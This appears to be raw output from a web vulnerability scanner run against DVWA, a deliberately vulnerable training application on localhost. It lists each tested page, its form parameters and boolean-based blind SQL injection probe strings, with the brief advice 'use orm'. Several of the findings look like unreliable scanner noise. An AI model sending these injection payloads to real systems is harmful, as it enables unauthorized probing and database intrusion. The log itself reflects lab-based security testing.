Target: http://localhost/dvwa/ (GET)

---
URL:http://localhost/dvwa/setup.php (POST)
VulnName: blind sqli
Query: {'user_token': '1c0ac16c839758613a5ad405af739379', 'create_db': 'Create / Reset Database'}
Payload: '	and	'28793'='28793
'	and	'43670'='43670
'	or	13600=13600#
'	and	'19081'='19082
Advice: use orm
Database: unknown
---
---
URL:http://localhost/dvwa/vulnerabilities/csrf/ (GET)
VulnName: 
Query: {'password_new': 'cntvalue', 'password_current': 'cntvalue', 'password_conf': 'cntvalue', 'Change': 'Change', 'user_token': '7b34ad6ed65b7f36d872f9fe98da327b'}
Payload: "+and+"52337"="52337
"+and+"3870"="3870
"+or+79049=79049#
"+and+"56877"="56878
Advice: 
Database: unknown
---
---
URL:http://localhost/dvwa/vulnerabilities/exec/ (POST)
VulnName: 
Query: {'ip': 'cntvalue', 'Submit': 'Submit', 'user_token': '064be4d1d310246064004890a3e38247'}
Payload: 	and	19736=19736
	and	30656=30656
	or	43204=43204#
	and	63709=63710
Advice: 
Database: unknown
---
---
URL:http://localhost/dvwa/vulnerabilities/sqli/ (GET)
VulnName: blind sqli
Query: {'user_token': '34716344ed70ff3f193324b2a483ded6', 'id': 'cntvalue', 'Submit': 'Submit'}
Payload: '+and+'83530'='83530
'+and+'43803'='43803
'+or+74363=74363#
'+and+'94783'='94784
Advice: use orm
Database: unknown
---
---
URL:http://localhost/dvwa/vulnerabilities/captcha/ (POST)
VulnName: blind sqli
Query: {'password_current': 'cntvalue', 'password_conf': 'cntvalue', 'recaptcha_response_field': 'manual_challenge', 'recaptcha_challenge_field': '', 'password_new': 'cntvalue', 'user_token': '0725597ee314953ebd243ac85984ade6', 'step': '1', 'Change': 'Change'}
Payload: '+and+'83530'='83530
'+and+'43803'='43803
'+or+74363=74363#
'+and+'94783'='94784
Advice: use orm
Database: unknown
---
---
URL:http://localhost/dvwa/vulnerabilities/xss_r/ (GET)
VulnName: 
Query: {'user_token': '60ac67715a9cb84e7b370c687c9fbf35', 'name': 'cntvalue'}
Payload: '+and+'83530'='83530
'+and+'43803'='43803
'+or+74363=74363#
'+and+'94783'='94784
Advice: 
Database: unknown
---
---
URL:http://localhost/dvwa/vulnerabilities/brute/ (POST)
VulnName: blind sqli
Query: {'username': 'cntvalue', 'user_token': 'c1f155b38fa87942cd5a63684a276558', 'Login': 'Login', 'password': 'cntvalue'}
Payload: 	and	19736=19736
	and	30656=30656
	or	43204=43204#
	and	63709=63710
Advice: use orm
Database: unknown
---
---
URL:http://localhost/dvwa/vulnerabilities/sqli_blind/ (GET)
VulnName: blind sqli
Query: {'user_token': '1f9c3e10f81ecc73650c01b2e7d23e0c', 'id': 'cntvalue', 'Submit': 'Submit'}
Payload: +and+33425=33425
+and+88046=88046
+or+54936=54936#
+and+27389=27390
Advice: use orm
Database: unknown
---